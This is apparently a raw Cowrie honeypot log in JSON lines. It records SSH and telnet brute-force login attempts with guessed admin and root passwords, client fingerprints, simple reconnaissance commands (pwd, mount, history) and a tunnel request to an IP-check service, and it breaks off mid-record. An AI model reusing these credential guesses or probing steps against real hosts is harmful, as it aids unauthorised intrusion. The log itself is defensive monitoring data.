{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:52:13.061091Z","src_ip":"212.227.125.160","session":"983a55683361"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":38506,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ccd2d7d9d72","protocol":"ssh","message":"New connection: 201.148.180.50:38506 (1.2.3.4:22) [session: 3ccd2d7d9d72]","sensor":"my-vps","timestamp":"2025-08-31T08:52:22.223819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:52:23.400583Z","src_ip":"201.148.180.50","session":"3ccd2d7d9d72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:52:23.401275Z","src_ip":"201.148.180.50","session":"3ccd2d7d9d72"}
{"eventid":"cowrie.login.success","username":"root","password":"mdw!111096","message":"login attempt [root/mdw!111096] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:52:29.216371Z","src_ip":"201.148.180.50","session":"3ccd2d7d9d72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:52:31.328124Z","src_ip":"201.148.180.50","session":"3ccd2d7d9d72"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T08:52:31.328874Z","src_ip":"201.148.180.50","session":"3ccd2d7d9d72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:52:32.816649Z","src_ip":"201.148.180.50","session":"3ccd2d7d9d72"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:52:32.876682Z","src_ip":"201.148.180.50","session":"3ccd2d7d9d72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49466,"dst_ip":"1.2.3.4","dst_port":23,"session":"e97de31153c1","protocol":"telnet","message":"New connection: 212.227.125.160:49466 (1.2.3.4:23) [session: e97de31153c1]","sensor":"my-vps","timestamp":"2025-08-31T08:54:23.400933Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:54:31.120999Z","src_ip":"212.227.125.160","session":"77ea064508b9"}
{"eventid":"cowrie.session.closed","duration":180.12037229537964,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:54:31.124997Z","src_ip":"212.227.125.160","session":"77ea064508b9"}
{"eventid":"cowrie.session.closed","duration":13.288211584091187,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:54:36.689072Z","src_ip":"212.227.125.160","session":"e97de31153c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39465,"dst_ip":"1.2.3.4","dst_port":22,"session":"0378741af06e","protocol":"ssh","message":"New connection: 212.227.125.160:39465 (1.2.3.4:22) [session: 0378741af06e]","sensor":"my-vps","timestamp":"2025-08-31T08:55:42.582635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:55:42.583612Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:55:42.664237Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admins","message":"login attempt [admin/admins] failed","sensor":"my-vps","timestamp":"2025-08-31T08:55:43.077563Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T08:55:44.161365Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"","message":"login attempt [admin/] failed","sensor":"my-vps","timestamp":"2025-08-31T08:55:45.246161Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"7ujMko0admin","message":"login attempt [admin/7ujMko0admin] failed","sensor":"my-vps","timestamp":"2025-08-31T08:55:46.330004Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Admin@1234","message":"login attempt [admin/Admin@1234] failed","sensor":"my-vps","timestamp":"2025-08-31T08:55:47.413888Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:55:48.498075Z","src_ip":"212.227.125.160","session":"0378741af06e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45602,"dst_ip":"1.2.3.4","dst_port":23,"session":"dbbf4b44b4c3","protocol":"telnet","message":"New connection: 212.227.125.160:45602 (1.2.3.4:23) [session: dbbf4b44b4c3]","sensor":"my-vps","timestamp":"2025-08-31T08:56:10.508094Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49256,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb7b2fd61e0d","protocol":"telnet","message":"New connection: 212.227.235.229:49256 (1.2.3.4:23) [session: cb7b2fd61e0d]","sensor":"my-vps","timestamp":"2025-08-31T08:56:11.913982Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34961,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab70e08bd9fb","protocol":"ssh","message":"New connection: 212.227.235.229:34961 (1.2.3.4:22) [session: ab70e08bd9fb]","sensor":"my-vps","timestamp":"2025-08-31T08:56:35.338460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:56:37.052274Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:56:37.156516Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"twins2","message":"login attempt [admin/twins2] failed","sensor":"my-vps","timestamp":"2025-08-31T08:56:37.661550Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"triplets","message":"login attempt [admin/triplets] failed","sensor":"my-vps","timestamp":"2025-08-31T08:56:38.768852Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"timothy1","message":"login attempt [admin/timothy1] failed","sensor":"my-vps","timestamp":"2025-08-31T08:56:39.876146Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"timelord","message":"login attempt [admin/timelord] failed","sensor":"my-vps","timestamp":"2025-08-31T08:56:40.983953Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"thriller","message":"login attempt [admin/thriller] failed","sensor":"my-vps","timestamp":"2025-08-31T08:56:42.091417Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:56:43.199549Z","src_ip":"212.227.235.229","session":"ab70e08bd9fb"}
{"eventid":"cowrie.session.closed","duration":40.12311291694641,"message":"Connection lost after 40 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:56:50.631133Z","src_ip":"212.227.125.160","session":"dbbf4b44b4c3"}
{"eventid":"cowrie.session.closed","duration":40.16495203971863,"message":"Connection lost after 40 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:56:52.078875Z","src_ip":"212.227.235.229","session":"cb7b2fd61e0d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49984,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba33e6b5f796","protocol":"ssh","message":"New connection: 217.72.205.35:49984 (1.2.3.4:22) [session: ba33e6b5f796]","sensor":"my-vps","timestamp":"2025-08-31T08:58:23.331105Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:58:23.332221Z","src_ip":"217.72.205.35","session":"ba33e6b5f796"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39984,"dst_ip":"1.2.3.4","dst_port":22,"session":"937815e22698","protocol":"ssh","message":"New connection: 212.227.125.160:39984 (1.2.3.4:22) [session: 937815e22698]","sensor":"my-vps","timestamp":"2025-08-31T08:58:35.145446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:58:35.932998Z","src_ip":"212.227.125.160","session":"937815e22698"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:58:36.240711Z","src_ip":"212.227.125.160","session":"937815e22698"}
{"eventid":"cowrie.login.success","username":"root","password":"Mzx041293@","message":"login attempt [root/Mzx041293@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:58:39.370445Z","src_ip":"212.227.125.160","session":"937815e22698"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:58:41.946605Z","src_ip":"212.227.125.160","session":"937815e22698"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T08:58:41.947329Z","src_ip":"212.227.125.160","session":"937815e22698"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:58:42.963927Z","src_ip":"212.227.125.160","session":"937815e22698"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:58:42.965096Z","src_ip":"212.227.125.160","session":"937815e22698"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":55590,"dst_ip":"1.2.3.4","dst_port":22,"session":"a03369ccd427","protocol":"ssh","message":"New connection: 201.148.180.50:55590 (1.2.3.4:22) [session: a03369ccd427]","sensor":"my-vps","timestamp":"2025-08-31T08:58:54.118150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:58:55.398877Z","src_ip":"201.148.180.50","session":"a03369ccd427"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:58:55.399961Z","src_ip":"201.148.180.50","session":"a03369ccd427"}
{"eventid":"cowrie.login.success","username":"root","password":"Mzx041293@","message":"login attempt [root/Mzx041293@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:58:59.416652Z","src_ip":"201.148.180.50","session":"a03369ccd427"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:59:01.989900Z","src_ip":"201.148.180.50","session":"a03369ccd427"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T08:59:01.990735Z","src_ip":"201.148.180.50","session":"a03369ccd427"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:59:03.607363Z","src_ip":"201.148.180.50","session":"a03369ccd427"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:59:03.608591Z","src_ip":"201.148.180.50","session":"a03369ccd427"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58468,"dst_ip":"1.2.3.4","dst_port":22,"session":"c37996a36252","protocol":"ssh","message":"New connection: 212.227.125.160:58468 (1.2.3.4:22) [session: c37996a36252]","sensor":"my-vps","timestamp":"2025-08-31T08:59:17.967119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T08:59:17.968055Z","src_ip":"212.227.125.160","session":"c37996a36252"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T08:59:18.018107Z","src_ip":"212.227.125.160","session":"c37996a36252"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:59:18.272851Z","src_ip":"212.227.125.160","session":"c37996a36252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"52.208.26.198","dst_port":443,"src_ip":"212.227.125.160","src_port":55966,"message":"direct-tcp connection request to 52.208.26.198:443 from 127.0.0.1:55966","sensor":"my-vps","timestamp":"2025-08-31T08:59:18.877813Z","session":"c37996a36252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"52.208.26.198","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xdfO\\x8e\\xd4\\x864\\xdc\\xd6\\x1b\\xcbr\\xc5\\x86\\x9fs\\x96Vk\\xbe\\xa8\\xb7\\t\\xb7\\xee\\xaa2B\\xa9*^\\xd3\\xc1 \\xca\\xeeiC\\x03\\xa9\\xf4N\\xb4~\\xfb\\xc8Z\\xce+\\x04b Q>\\xaf\\xc3\\xedM\\xfa5\\xec\\xdb\\xeed\\x98\\xe8\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe578\\t\\xb3\\x98 \\x9d\\xa5Q\\x85\\x1bG!\\x99\\x96U\\x06J*:SP\\xb5\\x08\\x95\\xd4\\x8b\\x06\\x9b\\x96\\x03\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\